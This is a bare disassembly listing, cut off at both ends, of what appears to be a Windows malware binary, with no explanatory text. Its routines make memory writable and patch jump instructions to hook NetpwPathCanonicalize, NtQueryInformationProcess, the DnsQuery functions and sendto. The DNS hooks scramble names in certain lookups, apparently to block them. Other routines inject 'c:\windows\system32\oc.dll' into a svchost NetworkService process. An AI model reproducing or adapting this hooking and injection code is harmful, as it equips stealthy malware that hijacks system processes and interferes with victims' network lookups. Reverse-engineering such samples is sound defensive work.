xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9D62: ; DATA XREF: .text:stru_9A4098�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9D65: ; CODE XREF: sub_9A9D17+1B�j
; sub_9A9D17+40�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9D17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A9D72(wchar_t *Str, int, int, int, int, int)
sub_9A9D72 proc near ; DATA XREF: sub_9AA482+5�o
Str = dword ptr 8
push ebp
mov ebp, esp
cmp ds:lpAddress, 0
jz short loc_9A9D96
push [ebp+Str] ; Str
call sub_9A9D17
test eax, eax
pop ecx
jz short loc_9A9D96
mov eax, ds:lpAddress
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A9D96: ; CODE XREF: sub_9A9D72+A�j
; sub_9A9D72+17�j
push 57h ; dwErrCode
call SetLastError
push 57h
pop eax
pop ebp
retn 18h
sub_9A9D72 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9DA5 proc near ; CODE XREF: sub_9A9DD2+3E�p
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset stru_9A40A8
call __SEH_prolog
mov eax, [ebp+arg_0]
and [ebp+ms_exc.disabled], 0
mov cl, [eax]
or cl, 70h
mov [eax], cl
jmp short loc_9A9DC8
; ---------------------------------------------------------------------------
loc_9A9DC1: ; DATA XREF: .text:stru_9A40A8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9DC5: ; DATA XREF: .text:stru_9A40A8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9DC8: ; CODE XREF: sub_9A9DA5+1A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9A9DA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9DD2 proc near ; DATA XREF: sub_9AA49F+5�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, ds:dword_9BA150
test eax, eax
jz short loc_9A9E1B
push esi
push [ebp+arg_10]
add eax, 4
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; dword_9BA154
cmp [ebp+arg_4], 22h
mov esi, eax
jnz short loc_9A9E16
cmp [ebp+arg_0], 0FFFFFFFFh
jnz short loc_9A9E16
cmp [ebp+arg_8], 0
jz short loc_9A9E16
cmp [ebp+arg_C], 0
jz short loc_9A9E16
push [ebp+arg_8]
call sub_9A9DA5
pop ecx
loc_9A9E16: ; CODE XREF: sub_9A9DD2+27�j
; sub_9A9DD2+2D�j ...
mov eax, esi
pop esi
jmp short loc_9A9E1E
; ---------------------------------------------------------------------------
loc_9A9E1B: ; CODE XREF: sub_9A9DD2+A�j
push 57h
pop eax
loc_9A9E1E: ; CODE XREF: sub_9A9DD2+47�j
pop ebp
retn 14h
sub_9A9DD2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9E22(char *lpFirst)
sub_9A9E22 proc near ; CODE XREF: sub_9A9E5D+F�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFirst = dword ptr 8
push 0Ch
push offset stru_9A40B8
call __SEH_prolog
xor eax, eax
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpFirst], eax
jz short loc_9A9E50
push [ebp+lpFirst] ; lpFirst
call sub_9A8D37
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A9E50
; ---------------------------------------------------------------------------
loc_9A9E49: ; DATA XREF: .text:stru_9A40B8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9E4D: ; DATA XREF: .text:stru_9A40B8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9E50: ; CODE XREF: sub_9A9E22+17�j
; sub_9A9E22+25�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9E22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A9E5D(char *lpFirst, int, int, int, int, int)
sub_9A9E5D proc near ; DATA XREF: sub_9AA4BC+9�o
lpFirst = dword ptr 8
push ebp
mov ebp, esp
cmp ds:dword_9BA154, 0
jz short loc_9A9E81
push [ebp+lpFirst] ; lpFirst
call sub_9A9E22
test eax, eax
pop ecx
jnz short loc_9A9E81
mov eax, ds:dword_9BA154
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A9E81: ; CODE XREF: sub_9A9E5D+A�j
; sub_9A9E5D+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A9E5D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9E95(LPCSTR lpMultiByteStr)
sub_9A9E95 proc near ; CODE XREF: sub_9A9F18+F�p
WideCharStr = word ptr -31Ch
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpMultiByteStr = dword ptr 8
push 30Ch
push offset stru_9A40C8
call __SEH_prolog
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+ms_exc.disabled], edi
cmp [ebp+lpMultiByteStr], edi
jz short loc_9A9F0B
mov esi, 100h
push esi ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push 0FFFFFFFFh ; cbMultiByte
push [ebp+lpMultiByteStr] ; lpMultiByteStr
push edi ; dwFlags
push 0FDE9h ; CodePage
call MultiByteToWideChar
test eax, eax
jz short loc_9A9F0B
push edi ; lpUsedDefaultChar
push edi ; lpDefaultChar
push esi ; cbMultiByte
lea eax, [ebp+First]
push eax ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
lea eax, [ebp+WideCharStr]
push eax ; lpWideCharStr
push edi ; dwFlags
push edi ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A9F0B
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A8D37
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A9F0B
; ---------------------------------------------------------------------------
loc_9A9F04: ; DATA XREF: .text:stru_9A40C8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9F08: ; DATA XREF: .text:stru_9A40C8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9F0B: ; CODE XREF: sub_9A9E95+1A�j
; sub_9A9E95+3C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9A9E95 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A9F18(LPCSTR lpMultiByteStr, int, int, int, int, int)
sub_9A9F18 proc near ; DATA XREF: sub_9AA4BC+23�o
lpMultiByteStr = dword ptr 8
push ebp
mov ebp, esp
cmp ds:dword_9BA158, 0
jz short loc_9A9F3C
push [ebp+lpMultiByteStr] ; lpMultiByteStr
call sub_9A9E95
test eax, eax
pop ecx
jnz short loc_9A9F3C
mov eax, ds:dword_9BA158
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A9F3C: ; CODE XREF: sub_9A9F18+A�j
; sub_9A9F18+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A9F18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9A9F50(LPCWSTR lpWideCharStr)
sub_9A9F50 proc near ; CODE XREF: sub_9A9FAE+F�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpWideCharStr = dword ptr 8
push 10Ch
push offset stru_9A40D8
call __SEH_prolog
xor eax, eax
mov [ebp+ms_exc.disabled], eax
cmp [ebp+lpWideCharStr], eax
jz short loc_9A9FA1
push eax ; lpUsedDefaultChar
push eax ; lpDefaultChar
push 100h ; cbMultiByte
lea ecx, [ebp+First]
push ecx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push [ebp+lpWideCharStr] ; lpWideCharStr
push eax ; dwFlags
push eax ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9A9FA1
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A8D37
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9A9FA1
; ---------------------------------------------------------------------------
loc_9A9F9A: ; DATA XREF: .text:stru_9A40D8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9A9F9E: ; DATA XREF: .text:stru_9A40D8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9A9FA1: ; CODE XREF: sub_9A9F50+17�j
; sub_9A9F50+36�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
inc eax
call __SEH_epilog
retn
sub_9A9F50 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_9A9FAE(LPCWSTR lpWideCharStr, int, int, int, int, int)
sub_9A9FAE proc near ; DATA XREF: sub_9AA4BC+3A�o
lpWideCharStr = dword ptr 8
push ebp
mov ebp, esp
cmp ds:dword_9BA15C, 0
jz short loc_9A9FD2
push [ebp+lpWideCharStr] ; lpWideCharStr
call sub_9A9F50
test eax, eax
pop ecx
jnz short loc_9A9FD2
mov eax, ds:dword_9BA15C
add eax, 4
pop ebp
jmp eax
; ---------------------------------------------------------------------------
loc_9A9FD2: ; CODE XREF: sub_9A9FAE+A�j
; sub_9A9FAE+17�j
push 5B4h ; dwErrCode
call SetLastError
mov eax, 5B4h
pop ebp
retn 18h
sub_9A9FAE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9A9FE6 proc near ; CODE XREF: .text:009AA05C�p
First = byte ptr -11Ch
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10Ch
push offset stru_9A40E8
call __SEH_prolog
mov eax, [ebp+arg_0]
xor ecx, ecx
mov [ebp+var_1C], ecx
mov [ebp+ms_exc.disabled], ecx
cmp eax, ecx
jz short loc_9AA040
mov eax, [eax]
cmp eax, ecx
jz short loc_9AA040
push ecx ; lpUsedDefaultChar
push ecx ; lpDefaultChar
push 100h ; cbMultiByte
lea edx, [ebp+First]
push edx ; lpMultiByteStr
push 0FFFFFFFFh ; cchWideChar
push eax ; lpWideCharStr
push ecx ; dwFlags
push ecx ; CodePage
call WideCharToMultiByte
test eax, eax
jz short loc_9AA040
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A8D37
pop ecx
mov [ebp+var_1C], eax
jmp short loc_9AA040
; ---------------------------------------------------------------------------
loc_9AA039: ; DATA XREF: .text:stru_9A40E8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA03D: ; DATA XREF: .text:stru_9A40E8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA040: ; CODE XREF: sub_9A9FE6+1C�j
; sub_9A9FE6+22�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn 4
sub_9A9FE6 endp
; ---------------------------------------------------------------------------
loc_9AA04F: ; DATA XREF: sub_9AA4BC+51�o
cmp ds:dword_9BA160, 0
jz short loc_9AA06F
push dword ptr [esp+4]
call sub_9A9FE6
test eax, eax
jnz short loc_9AA06F
mov eax, ds:dword_9BA160
add eax, 4
jmp eax
; ---------------------------------------------------------------------------
loc_9AA06F: ; CODE XREF: .text:009AA056�j
; .text:009AA063�j
push 5B4h
call SetLastError
mov eax, 5B4h
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA082 proc near ; CODE XREF: sub_9AA29B+12�p
Dst = dword ptr -244h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 234h
push offset stru_9A40F8
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_1C], ebx
mov [ebp+ms_exc.disabled], ebx
call GetCurrentProcessId
push eax ; th32ProcessID
push 8 ; dwFlags
call CreateToolhelp32Snapshot
mov edi, eax
mov [ebp+var_20], edi
cmp edi, 0FFFFFFFFh
jz short loc_9AA128
mov esi, 224h
push esi ; Size
push ebx ; Val
lea eax, [ebp+Dst]
push eax ; Dst
call memset
add esp, 0Ch
mov [ebp+Dst], esi
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32First
jmp short loc_9AA114
; ---------------------------------------------------------------------------
loc_9AA0DC: ; CODE XREF: sub_9AA082+94�j
mov eax, [ebp+var_230]
cmp [ebp+arg_0], eax
jb short loc_9AA107
mov ecx, [ebp+var_22C]
add ecx, eax
cmp [ebp+arg_0], ecx
jnb short loc_9AA107
cmp [ebp+arg_4], ebx
jz short loc_9AA0FE
cmp eax, [ebp+arg_4]
jnz short loc_9AA107
loc_9AA0FE: ; CODE XREF: sub_9AA082+75�j
mov [ebp+var_1C], 1
jmp short loc_9AA118
; ---------------------------------------------------------------------------
loc_9AA107: ; CODE XREF: sub_9AA082+63�j
; sub_9AA082+70�j ...
lea eax, [ebp+Dst]
push eax ; lpme
push edi ; hSnapshot
call Module32Next
loc_9AA114: ; CODE XREF: sub_9AA082+58�j
test eax, eax
jnz short loc_9AA0DC
loc_9AA118: ; CODE XREF: sub_9AA082+83�j
push edi ; hObject
call CloseHandle
jmp short loc_9AA128
; ---------------------------------------------------------------------------
loc_9AA121: ; DATA XREF: .text:stru_9A40F8�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA125: ; DATA XREF: .text:stru_9A40F8�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA128: ; CODE XREF: sub_9AA082+2D�j
; sub_9AA082+9D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_1C]
call __SEH_epilog
retn
sub_9AA082 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA135 proc near ; CODE XREF: sub_9AA1CD+65�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push 18h
push offset stru_9A4108
call __SEH_prolog
xor edi, edi
mov [ebp+var_24], edi
mov [ebp+ms_exc.disabled], edi
mov esi, [ebp+arg_0]
add esi, 0Ch
mov [ebp+var_1C], esi
loc_9AA152: ; CODE XREF: sub_9AA135+95�j
mov [ebp+var_20], edi
loc_9AA155: ; CODE XREF: sub_9AA135+8B�j
cmp edi, [ebp+arg_C]
jnb short loc_9AA16E
mov al, [esi]
test al, al
jnz short loc_9AA180
mov [ebp+var_24], 1
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 0
loc_9AA16E: ; CODE XREF: sub_9AA135+23�j
; sub_9AA135+5D�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_24]
call __SEH_epilog
retn
; ---------------------------------------------------------------------------
loc_9AA180: ; CODE XREF: sub_9AA135+29�j
movsx ebx, al
mov [ebp+var_28], ebx
inc esi
mov [ebp+var_1C], esi
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AA16E
push ebx ; Size
push esi ; Src
mov eax, [ebp+arg_8]
add eax, edi
push eax ; Dst
call memcpy
add esp, 0Ch
add esi, ebx
mov [ebp+var_1C], esi
add edi, ebx
mov [ebp+var_20], edi
cmp edi, [ebp+arg_C]
jnb short loc_9AA16E
mov eax, esi
sub eax, [ebp+arg_0]
cmp eax, [ebp+arg_4]
jnb short loc_9AA16E
cmp byte ptr [esi], 0
jz short loc_9AA155
mov eax, [ebp+arg_8]
mov byte ptr [edi+eax], 2Eh
inc edi
jmp short loc_9AA152
sub_9AA135 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA1CD proc near ; CODE XREF: sub_9AA29B+23�p
First = byte ptr -128h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 118h
push offset stru_9A4118
call __SEH_prolog
mov esi, edx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
mov [ebp+var_20], esi
mov al, [esi+2]
test al, 78h
jnz loc_9AA291
test al, 1
jz loc_9AA291
cmp [esi+6], di
jnz loc_9AA291
cmp [esi+8], di
jnz loc_9AA291
cmp [esi+0Ah], di
jnz short loc_9AA291
cmp byte ptr [esi+ecx-5], 0
jnz short loc_9AA291
cmp dword ptr [esi+ecx-4], 1000100h
jnz short loc_9AA291
push 104h
lea eax, [ebp+First]
push eax
push ecx
push esi
call sub_9AA135
add esp, 10h
test eax, eax
jz short loc_9AA291
lea eax, [ebp+First]
push eax ; lpFirst
call sub_9A8D37
pop ecx
test eax, eax
jz short loc_9AA291
lea eax, [ebp+First]
push eax ; Str
call strlen
pop ecx
mov ebx, eax
mov [ebp+var_24], ebx
mov [ebp+var_1C], edi
loc_9AA264: ; CODE XREF: sub_9AA1CD+B6�j
cmp [ebp+var_1C], ebx
jnb short loc_9AA285
call rand
xor edx, edx
push 1Ah
pop ecx
div ecx
add edx, 61h
mov eax, [ebp+var_1C]
mov [eax+esi+0Dh], dl
inc [ebp+var_1C]
jmp short loc_9AA264
; ---------------------------------------------------------------------------
loc_9AA285: ; CODE XREF: sub_9AA1CD+9A�j
mov [esi+0Ch], bl
jmp short loc_9AA291
; ---------------------------------------------------------------------------
loc_9AA28A: ; DATA XREF: .text:stru_9A4118�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA28E: ; DATA XREF: .text:stru_9A4118�o
mov esp, [ebp+ms_exc.old_esp]
loc_9AA291: ; CODE XREF: sub_9AA1CD+1E�j
; sub_9AA1CD+26�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_9AA1CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AA29B proc near ; DATA XREF: sub_9AA53A+1A�o
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 12h
jl short loc_9AA2C3
push ds:dword_9BA168
push dword ptr [ebp+4]
call sub_9AA082
test eax, eax
pop ecx
pop ecx
jz short loc_9AA2C3
mov ecx, [ebp+arg_8]
mov edx, [ebp+arg_4]
call sub_9AA1CD
loc_9AA2C3: ; CODE XREF: sub_9AA29B+7�j
; sub_9AA29B+1B�j
mov eax, ds:dword_9BA164
add eax, 4
pop ebp
jmp eax
sub_9AA29B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA2CE(LPVOID lpAddress)
sub_9AA2CE proc near ; CODE XREF: sub_9AA40D+51�p
Src = byte ptr -40h
var_3F = dword ptr -3Fh
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
nPriority = dword ptr -28h
flOldProtect = dword ptr -24h
var_20 = dword ptr -20h
hThread = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpAddress = dword ptr 8
push 30h
push offset stru_9A4128
call __SEH_prolog
mov esi, ecx
mov edi, edx
xor ebx, ebx
mov [ebp+var_2C], ebx
call GetCurrentThread
mov [ebp+hThread], eax
push eax ; hThread
call GetThreadPriority
mov [ebp+nPriority], eax
mov [ebp+ms_exc.disabled], ebx
push 2Ch ; Size
push ebx ; Val
push esi ; Dst
call memset
add esp, 0Ch
mov [esi+28h], edi
mov ecx, [ebp+lpAddress]
mov [esi+24h], ecx
mov [ebp+var_20], ecx
mov [ebp+var_34], ebx
mov [ebp+var_38], 5
loc_9AA31B: ; CODE XREF: sub_9AA2CE+9F�j
cmp ebx, 5
jge short loc_9AA37A
mov eax, [ebp+var_20]
add eax, ebx
push eax
call loc_9B6C60
mov [ebp+var_30], eax
lea ecx, [ebx+esi+4]
push eax ; Size
mov eax, [ebp+var_20]
add eax, ebx
push eax ; Src
push ecx ; Dst
call memcpy
add esp, 10h
mov al, [ebx+esi+4]
mov cl, al
and cl, 0FEh
cmp cl, 0E8h
jz short loc_9AA36F
cmp al, 0FFh
jnz short loc_9AA360
mov al, [ebx+esi+5]
cmp al, 25h
jz short loc_9AA36F
cmp al, 15h
jz short loc_9AA36F
loc_9AA360: ; CODE XREF: sub_9AA2CE+84�j
mov eax, [ebp+var_30]
add ebx, eax
mov [esi], ebx
mov [ebp+var_34], ebx
mov ecx, [ebp+lpAddress]
jmp short loc_9AA31B
; ---------------------------------------------------------------------------
loc_9AA36F: ; CODE XREF: sub_9AA2CE+80�j
; sub_9AA2CE+8C�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor eax, eax
jmp loc_9AA407
; ---------------------------------------------------------------------------
loc_9AA37A: ; CODE XREF: sub_9AA2CE+50�j
lea eax, [ebx+esi]
mov byte ptr [eax+4], 0E9h
mov edx, [esi]
sub edx, ebx
sub edx, esi
lea edx, [edx+ecx-9]
mov [eax+5], edx
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push 40h ; flNewProtect
push dword ptr [esi] ; dwSize
push ecx ; lpAddress
mov ebx, VirtualProtect
call ebx ; VirtualProtect
test eax, eax
jz short loc_9AA400
mov [ebp+Src], 0E9h
sub edi, [ebp+lpAddress]
sub edi, 5
mov [ebp+var_3F], edi
push 0Fh ; nPriority
push [ebp+hThread] ; hThread
mov edi, SetThreadPriority
call edi ; SetThreadPriority
push 5 ; Size
lea eax, [ebp+Src]
push eax ; Src
push [ebp+lpAddress] ; Dst
call memcpy
add esp, 0Ch
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call edi ; SetThreadPriority
lea eax, [ebp+flOldProtect]
push eax ; lpflOldProtect
push [ebp+flOldProtect] ; flNewProtect
push dword ptr [esi] ; dwSize
push [ebp+lpAddress] ; lpAddress
call ebx ; VirtualProtect
mov [ebp+var_2C], 1
jmp short loc_9AA400
; ---------------------------------------------------------------------------
loc_9AA3ED: ; DATA XREF: .text:stru_9A4128�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AA3F1: ; DATA XREF: .text:stru_9A4128�o
mov esp, [ebp+ms_exc.old_esp]
push [ebp+nPriority] ; nPriority
push [ebp+hThread] ; hThread
call SetThreadPriority
loc_9AA400: ; CODE XREF: sub_9AA2CE+D3�j
; sub_9AA2CE+11D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
mov eax, [ebp+var_2C]
loc_9AA407: ; CODE XREF: sub_9AA2CE+A7�j
call __SEH_epilog
retn
sub_9AA2CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA40D(LPCSTR lpLibFileName, LPCSTR lpProcName, int, int)
sub_9AA40D proc near ; CODE XREF: sub_9AA482+14�p
; sub_9AA49F+14�p ...
lpLibFileName = dword ptr 8
lpProcName = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push edi
push [ebp+lpLibFileName] ; lpModuleName
xor edi, edi
call GetModuleHandleA
test eax, eax
jnz short loc_9AA42D
push [ebp+lpLibFileName] ; lpLibFileName
call LoadLibraryA
test eax, eax
jz short loc_9AA47D
loc_9AA42D: ; CODE XREF: sub_9AA40D+11�j
push esi
push [ebp+lpProcName] ; lpProcName
push eax ; hModule
call GetProcAddress
mov esi, eax
test esi, esi
jz short loc_9AA47C
push 40h ; flProtect
push 103000h ; flAllocationType
push 2Ch ; dwSize
push 0 ; lpAddress
call VirtualAlloc
test eax, eax
mov ecx, [ebp+arg_C]
mov [ecx], eax
jz short loc_9AA47C
mov edx, [ebp+arg_8]
push esi ; lpAddress
mov ecx, eax
call sub_9AA2CE
mov edi, eax
test edi, edi
pop ecx
jnz short loc_9AA47C
push 8000h ; dwFreeType
push eax ; dwSize
push ds:lpAddress ; lpAddress
call VirtualFree
loc_9AA47C: ; CODE XREF: sub_9AA40D+2F�j
; sub_9AA40D+49�j ...
pop esi
loc_9AA47D: ; CODE XREF: sub_9AA40D+1E�j
mov eax, edi
pop edi
pop ebp
retn
sub_9AA40D endp
; =============== S U B R O U T I N E =======================================
sub_9AA482 proc near ; CODE XREF: sub_9A799E+1B6�p
; sub_9A799E+1D0�p
push offset lpAddress ; int
push offset sub_9A9D72 ; int
push offset aNetpwpathcanon ; "NetpwPathCanonicalize"
push offset dword_9A4134 ; lpLibFileName
call sub_9AA40D
add esp, 10h
retn
sub_9AA482 endp
; =============== S U B R O U T I N E =======================================
sub_9AA49F proc near ; CODE XREF: sub_9A799E+29�p
push offset dword_9BA150 ; int
push offset sub_9A9DD2 ; int
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call sub_9AA40D
add esp, 10h
retn
sub_9AA49F endp
; =============== S U B R O U T I N E =======================================
sub_9AA4BC proc near ; CODE XREF: sub_9A799E+1E5�p
push ebx
push ebp
push esi
push edi
push offset dword_9BA154 ; int
push offset sub_9A9E5D ; int
push offset aDnsquery_a ; "DnsQuery_A"
mov esi, offset aDnsapi_dll ; "dnsapi.dll"
push esi ; lpLibFileName
call sub_9AA40D
push offset dword_9BA158 ; int
push offset sub_9A9F18 ; int
push offset aDnsquery_utf8 ; "DnsQuery_UTF8"
push esi ; lpLibFileName
mov edi, eax
call sub_9AA40D
push offset dword_9BA15C ; int
push offset sub_9A9FAE ; int
push offset aDnsquery_w ; "DnsQuery_W"
push esi ; lpLibFileName
mov ebx, eax
call sub_9AA40D
push offset dword_9BA160 ; int
push offset loc_9AA04F ; int
push offset aQuery_main ; "Query_Main"
push esi ; lpLibFileName
mov ebp, eax
call sub_9AA40D
add esp, 40h
test edi, edi
jz short loc_9AA533
test ebx, ebx
jz short loc_9AA533
test ebp, ebp
jz short loc_9AA533
xor eax, eax
inc eax
jmp short loc_9AA535
; ---------------------------------------------------------------------------
loc_9AA533: ; CODE XREF: sub_9AA4BC+68�j
; sub_9AA4BC+6C�j ...
xor eax, eax
loc_9AA535: ; CODE XREF: sub_9AA4BC+75�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_9AA4BC endp
; =============== S U B R O U T I N E =======================================
sub_9AA53A proc near ; CODE XREF: sub_9A799E+1BB�p
push offset ModuleName ; "dnsrslvr.dll"
call GetModuleHandleA
test eax, eax
mov ds:dword_9BA168, eax
jnz short loc_9AA54F
retn
; ---------------------------------------------------------------------------
loc_9AA54F: ; CODE XREF: sub_9AA53A+12�j
push offset dword_9BA164 ; int
push offset sub_9AA29B ; int
push offset aSendto ; "sendto"
push offset aWs2_32_dll ; "ws2_32.dll"
call sub_9AA40D
add esp, 10h
retn
sub_9AA53A endp
; =============== S U B R O U T I N E =======================================
sub_9AA56C proc near ; CODE XREF: StartAddress:loc_9A77DD�p
push esi
xor esi, esi
loc_9AA56F: ; CODE XREF: sub_9AA56C+21�j
push offset aSvchost_exeKNe ; "svchost.exe -k NetworkService"
call sub_9ABF43
test eax, eax
pop ecx
jnz short loc_9AA591
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9AA56F
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AA591: ; CODE XREF: sub_9AA56C+10�j
push offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
push eax ; dwProcessId
call sub_9ABCA4
pop ecx
pop ecx
pop esi
retn
sub_9AA56C endp
; =============== S U B R O U T I N E =======================================
sub_9AA5A0 proc near ; CODE XREF: StartAddress+4D�p
push esi
xor esi, esi
loc_9AA5A3: ; CODE XREF: sub_9AA5A0+21�j
push offset aOwedace ; "owedAce"
call sub_9ABC24
test eax, eax
pop ecx
jnz short loc_9AA5C5
push 3E8h ; dwMilliseconds
call Sleep
inc esi
cmp esi, 14h
jl short loc_9AA5A3
pop esi
retn
; ---------------------------------------------------------------------------
loc_9AA5C5: ; CODE XREF: sub_9AA5A0+10�j
push offset ExistingFileName ; "c:\\windows\\system32\\oc.dll"
push eax ; dwProcessId
call sub_9ABCA4
pop ecx
pop ecx
pop esi
retn
sub_9AA5A0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AA5D4(char *Dest)
sub_9AA5D4 proc near ; CODE XREF: sub_9AA85A+1AF�p
; sub_9AA85A+1E6�p ...
Dest = dword ptr 4
call rand
push 0Ah
cdq
pop ecx
idiv ecx
test edx, edx
jz short locret_9AA5FB
push esi
mov esi, edx
loc_9AA5E7: ; CODE XREF: sub_9AA5D4+24�j
push offset asc_9A4224 ; " "
push [esp+8+Dest] ; Dest
call strcat
dec esi
pop ecx
pop ecx
jnz short loc_9AA5E7
pop esi
locret_9AA5FB: ; CODE XREF: sub_9AA5D4+E�j
retn
sub_9AA5D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AA5FC(char *Dest)
sub_9AA5FC proc near ; CODE XREF: sub_9AA6DB+59�p
; sub_9AA6DB+7D�p ...
Source = byte ptr -4
